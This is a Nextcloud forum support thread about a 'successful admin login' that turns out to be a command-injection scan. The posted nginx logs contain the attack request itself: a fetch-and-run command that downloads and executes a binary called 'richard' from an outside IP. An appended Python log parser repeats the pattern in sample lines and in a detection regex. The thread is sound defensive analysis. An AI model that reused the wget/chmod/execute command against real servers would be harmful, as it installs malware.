Unauthorized login to an "admin" account that does not exist

Support intro

Sorry to hear you’re facing problems :slightly_frowning_face:

help.nextcloud.com is for home/non-enterprise users. If you’re running a business, paid support can be accessed via portal.nextcloud.com where we can ensure your business keeps running smoothly.

In order to help you as quickly as possible, before clicking Create Topic please provide as much of the below as you can. Feel free to use a pastebin service for logs, otherwise either indent short log examples with four spaces:

    example

Or for longer, use three backticks above and below the code snippet:

```
longer
example
here
```

Some or all of the below information will be requested if it isn’t supplied; for fastest response please provide as much as you can :heart:

Nextcloud version (eg, 12.0.2): 16.04
Operating system and version (eg, Ubuntu 17.04): 18.04.02
Apache or nginx version (eg, Apache 2.4.25): nginx 1.17.0
PHP version (eg, 7.1): PHP 7.3.8

The issue you are facing:
In logwatch (nextcloud / httpd) I saw a successful login to the admin account. There was never such an account on Nextcloud or on the host. The host has fail2ban, Spamhaus and GeoIP security. How is this possible? Could this be a vulnerability in Nextcloud or Nginx?
LOG

Is this the first time you’ve seen this error? (Y/N): Y

nginx access.log

    54.39.209.227 - admin [18/Aug/2019:01:06:17 +0200] "GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget hxxp://185.164.72.155/richard; curl -O hxxp[:]//185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1" 400 150 "-" "-"

    54.39.209.227 - - [18/Aug/2019:16:32:43 +0200] "POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1" 410 136 "hxxp://10.0.0.1/network_diagnostic_tools.php" ""

    54.39.209.227 - - [18/Aug/2019:16:32:43 +0200] "72.155/richard; curl -O hxxp://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4" 400 150 "-" "-"

I just saw a similar log entry on a webserver of mine (not running Nextcloud):

    5.39.37.10 - admin [26/Aug/2019:09:51:12 +0200] "GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget hxxp://185.164.72.155/richard; curl -O hxxp://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1" 400 182 "-" "-"

I think it’s an attempt to exploit a webserver vulnerability by trying to download and run a kind of malicious script. In my case, the source address belongs to an OVH server included in a web scan campaign: https://otx.alienvault.com/indicator/ip/5.39.37.10

The target address from which they try to download the file seems unresponsive: https://otx.alienvault.com/indicator/ip/185.164.72.155
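The "admin" in both posters' lines is nginx's `$remote_user` field, which is copied from whatever `Authorization: Basic` header the client chose to send before any authentication happens, and the 400 status shows the request was rejected, so the log records a claimed name on a failed scan, not a login. The following parser is an added example, not code from either poster or from Nextcloud; its log lines and IP addresses are constructed, and the field layout assumed is nginx's default "combined" format.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# nginx "combined" format:
# $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"
LOG_RE = re.compile(
    r'^(?P<addr>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shell fragments inside a request line: the signature of a command-injection scan.
SCAN_RE = re.compile(r'(\bcmd=|;\s*(wget|curl|chmod)\b|/tmp;)')

@dataclass
class Verdict:
    addr: str
    claimed_user: Optional[str]  # raw $remote_user, or None when nginx logged "-"
    status: int
    authenticated: bool          # True only when a claimed user ALSO got a 2xx/3xx answer
    looks_like_scan: bool

def classify(line: str) -> Verdict:
    """Separate 'client sent a username' from 'client was actually let in'."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError("line does not match the combined format: %r" % line)
    status = int(m["status"])
    user = None if m["user"] == "-" else m["user"]
    # $remote_user is decoded from the Authorization header the client supplied;
    # nginx logs it even when no auth_basic location exists. Only a successful
    # status turns that claim into evidence of access.
    authenticated = user is not None and 200 <= status < 400
    return Verdict(m["addr"], user, status, authenticated, bool(SCAN_RE.search(m["request"])))

def audit(lines: List[str]) -> List[Verdict]:
    return [classify(l) for l in lines if l.strip()]

# Constructed sample lines (RFC 5737 addresses), modelled on the shape of the posted entries.
SAMPLE_LOG = [
    '198.51.100.23 - admin [18/Aug/2019:01:06:17 +0200] "GET /cgi-bin/operator/servetest?cmd=cd /tmp; '
    'wget hxxp://203.0.113.9/payload; chmod +x payload; ./payload HTTP/1.1" 400 150 "-" "-"',
    '192.0.2.5 - - [18/Aug/2019:09:00:00 +0200] "POST /login HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for v in audit(SAMPLE_LOG):
        print(v)
```

Feeding the real access.log through `audit()` separates the spoofed-user scan hits (claimed user, 4xx, scan pattern) from requests that actually succeeded, which is the distinction logwatch's "successful login" summary collapsed.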